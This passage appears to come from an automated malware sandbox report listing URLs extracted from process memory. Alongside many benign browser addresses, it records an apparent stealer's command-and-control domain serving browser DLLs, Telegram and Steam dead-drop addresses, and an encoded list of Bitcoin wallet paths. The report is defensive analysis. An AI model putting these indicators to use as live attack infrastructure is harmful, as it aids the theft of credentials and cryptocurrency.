                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/J
                          Source: BitLockerToGo.exe, 00000003.00000003.1894034954.0000000003171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/L
                          Source: BitLockerToGo.exe, 00000003.00000003.2658570144.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2672447504.00000000031F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/Ma
                          Source: BitLockerToGo.exe, 00000003.00000003.1942242351.000000000316A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1918342759.000000000316A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1990478086.000000000316B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1965990439.000000000316B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1894034954.0000000003171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/Q
                          Source: BitLockerToGo.exe, 00000003.00000003.2658570144.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2672447504.00000000031F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/Ua
                          Source: BitLockerToGo.exe, 00000003.00000003.1942242351.000000000316A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1918342759.000000000316A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1990478086.000000000316B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1965990439.000000000316B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1894034954.0000000003171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/YE)
                          Source: BitLockerToGo.exe, 00000003.00000003.2378639595.00000000031E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/b
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/df
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/ex
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.000000000313B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2377963006.00000000031CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/freebl3.dll
                          Source: BitLockerToGo.exe, 00000003.00000003.1990478086.000000000316B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/kE
                          Source: BitLockerToGo.exe, 00000003.00000003.1942242351.000000000316A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1918342759.000000000316A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1990478086.000000000316B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1965990439.000000000316B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/lE
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.000000000313B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2377963006.00000000031CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/mozglue.dll
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.0000000003159000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/msvcp140.dll$
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.0000000003159000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/msvcp140.dllz
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.000000000313B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/nss3.dll
                          Source: BitLockerToGo.exe, 00000003.00000003.2378639595.00000000031E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/ou
                          Source: BitLockerToGo.exe, 00000003.00000003.1990478086.000000000316B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1965990439.000000000316B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/ou?E
                          Source: BitLockerToGo.exe, 00000003.00000003.1990478086.000000000316B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1965990439.000000000316B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/oubE
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/s
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.00000000030F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/sT$
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.0000000003159000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/softokn3.dll
                          Source: BitLockerToGo.exe, 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2671865903.000000000313B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/sqlo.dll
                          Source: BitLockerToGo.exe, 00000003.00000003.2658570144.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660816657.000000000320D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/ta
                          Source: BitLockerToGo.exe, 00000003.00000003.1942242351.000000000316A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1918342759.000000000316A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1990478086.000000000316B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1965990439.000000000316B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1894034954.0000000003171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/uE
                          Source: BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2671865903.0000000003159000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/vcruntime140.dll
                          Source: BitLockerToGo.exe, 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyouKEGDGH
                          Source: BitLockerToGo.exe, 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyouXEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8K
                          Source: BitLockerToGo.exe, 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyoua4a7f1267effnt-Disposition:
                          Source: BitLockerToGo.exe, 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyouata
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                          Source: 000003.log3.13.drString found in binary or memory: https://ntp.msn.com/
                          Source: QuotaManager.13.drString found in binary or memory: https://ntp.msn.com/_default
                          Source: Session_13376674111222586.13.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
                          Source: QuotaManager.13.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
                          Source: msedge.exe, 0000000B.00000002.2321715053.00006FE8003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                          Source: chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                          Source: chrome.exe, 00000007.00000003.2164260236.00002FC000BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                          Source: chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                          Source: chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://open.spotify.com
                          Source: chrome.exe, 00000007.00000003.2109818643.00002FC000790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
                          Source: chrome.exe, 00000007.00000003.2109818643.00002FC000790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
                          Source: chrome.exe, 00000007.00000003.2109818643.00002FC000790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
                          Source: chrome.exe, 00000007.00000003.2109818643.00002FC000790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
                          Source: chrome.exe, 00000007.00000003.2109818643.00002FC000790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://outlook.live.com/mail/0/
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://outlook.office.com/mail/0/
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSessionp
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                          Source: chrome.exe, 00000007.00000003.2115866965.00002FC00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115530307.00002FC000314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115781780.00002FC0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                          Source: chrome.exe, 00000007.00000003.2164352470.00002FC002D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2158236324.00002FC002BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2157940006.00002FC002C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2161928831.00002FC002C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                          Source: S0FTWARE.exe, 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199802540894
                          Source: S0FTWARE.exe, 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199802540894r08etMozilla/5.0
                          Source: IEHIII.3.drString found in binary or memory: https://support.mozilla.org
                          Source: IEHIII.3.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: IEHIII.3.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.000000000313B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.000000000313B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/fu4chmo
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.000000000313B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/fu4chmo:
                          Source: BitLockerToGo.exe, 00000003.00000003.1862532120.0000000003173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/fu4chmoQ
                          Source: S0FTWARE.exe, 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/fu4chmor08etMozilla/5.0
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://tidal.com/
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://twitter.com/
                          Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.13.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
                          Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.13.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
                          Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.13.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://vibe.naver.com/today
                          Source: BitLockerToGo.exe, 00000003.00000003.1861928505.0000000003173000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://web.telegram.org/
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://web.whatsapp.com
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660816657.0000000003234000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2671865903.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, BGDAAE.3.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.deezer.com/
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003314000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://www.digicert.com/CPS0
                          Source: BitLockerToGo.exe, 00000003.00000003.2376930526.0000000003252000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2180204344.0000000003252000.00000004.00000020.00020000.00000000.sdmp, KFIJEG.3.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: chrome.exe, 00000007.00000003.2109739044.00002FC000DBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                          Source: content_new.js.13.dr, content.js.13.drString found in binary or memory: https://www.google.com/chrome
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                          Source: BitLockerToGo.exe, 00000003.00000003.2376930526.0000000003252000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003346000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2180204344.0000000003252000.00000004.00000020.00020000.00000000.sdmp, FBFCAK.3.dr, KFIJEG.3.dr, Web Data.13.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: chrome.exe, 00000007.00000003.2164352470.00002FC002D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2158236324.00002FC002BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2157940006.00002FC002C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2161928831.00002FC002C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                          Source: chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                          Source: chrome.exe, 00000007.00000003.2115781780.00002FC0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                          Source: chrome.exe, 00000007.00000003.2154423360.00002FC002664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2154333501.00002FC002660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2154140903.00002FC00264C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2154230659.00002FC002650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                          Source: chrome.exe, 00000007.00000003.2113743139.00002FC000FBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                          Source: chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
